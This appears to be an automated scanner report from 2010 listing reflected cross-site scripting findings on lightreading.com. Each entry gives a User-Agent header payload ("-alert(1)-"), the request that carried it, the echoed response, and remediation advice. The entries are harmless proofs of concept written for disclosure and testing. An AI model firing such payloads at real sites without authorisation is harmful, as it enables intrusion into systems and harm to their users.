GET /blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& HTTP/1.1 Host: www.lightreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.109e989"-alert(1)-"7b3ba870779 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lightreading%5Flastvisit=12%2F1%2F2010+8%3A11%3A47+PM; lightreading%5Fvisits=1; s_nr=1291273863933
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d70"-alert(1)-"54e4836e960 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90d70"-alert(1)-"54e4836e960 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:01:42 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 262285 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90d70"-alert(1)-"54e4836e960"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe39"-alert(1)-"a8b91e4d902 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_reports.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efe39"-alert(1)-"a8b91e4d902 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:15 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 173823 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efe39"-alert(1)-"a8b91e4d902"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6781e"-alert(1)-"1eb6c2e8295 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_webinars.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6781e"-alert(1)-"1eb6c2e8295 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:36 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 238959 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6781e"-alert(1)-"1eb6c2e8295"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae606"-alert(1)-"769d806f023 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cisco-solution-center.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae606"-alert(1)-"769d806f023 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:19:56 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 129773 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cisco, Mobile Internet, Mobile Packet Core, IP RAN, Edge Networking, Core Networking, Con ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae606"-alert(1)-"769d806f023"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16307"-alert(1)-"509c6f419dc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16307"-alert(1)-"509c6f419dc Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:01:45 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 262285 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16307"-alert(1)-"509c6f419dc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcacf"-alert(1)-"ca4c9346e83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp?doc_id=173549 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bcacf"-alert(1)-"ca4c9346e83 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:13:38 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-Pingback: http://www.lightreading.com/xmlrpc.asp Last-modified: Sat, 11 Dec 2010 23:13:37 GMT Expires: Sun, 10 Apr 2011 19:13:37 GMT Etag: s200805.p200805 Content-Length: 205142 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cable/MSO equipment, Interactive advertising, Middleware & business support systems, TV, ...[SNIP]... terchange Format (EBIF) "; s.prop4="Enhanced TV Binary Interchange Format (EBIF) "; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bcacf"-alert(1)-"ca4c9346e83"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="20090313";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f63a0"-alert(1)-"cb34f8b9b35 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /email.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f63a0"-alert(1)-"cb34f8b9b35 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:01:53 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 266297 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f63a0"-alert(1)-"cb34f8b9b35"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57d2d"-alert(1)-"c9b49f01f41 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /europe HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57d2d"-alert(1)-"c9b49f01f41 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:13:18 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 241932 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57d2d"-alert(1)-"c9b49f01f41"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 907a7"-alert(1)-"83bf0f856aa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /europe/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)907a7"-alert(1)-"83bf0f856aa Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:19:22 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 247300 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)907a7"-alert(1)-"83bf0f856aa"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0084"-alert(1)-"4f874a9f84e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0084"-alert(1)-"4f874a9f84e Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:44 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 170460 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0084"-alert(1)-"4f874a9f84e"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2788b"-alert(1)-"f988734ae27 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-news/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2788b"-alert(1)-"f988734ae27 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:48 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:18:47 GMT Expires: Sun, 10 Apr 2011 19:18:47 GMT Etag: s200805.p200805 Content-Length: 185568 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2788b"-alert(1)-"f988734ae27"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17f2e"-alert(1)-"46e1dc72b00 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lg_redirect.asp?piddl_lgid_docid=200089 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17f2e"-alert(1)-"46e1dc72b00 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:16:43 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 155981 Cache-control: private
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21978"-alert(1)-"f2a59b2c5d6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lg_redirect.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: 21978"-alert(1)-"f2a59b2c5d6 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:38 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 267252 Cache-control: private
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c88e5"-alert(1)-"ddd3f7200f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /library.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c88e5"-alert(1)-"ddd3f7200f3 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:10 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 212829 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c88e5"-alert(1)-"ddd3f7200f3"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9aae"-alert(1)-"a88401eed5b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d9aae"-alert(1)-"a88401eed5b Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:11:53 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 176566 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d9aae"-alert(1)-"a88401eed5b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e7f0"-alert(1)-"49a4e60c5fa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
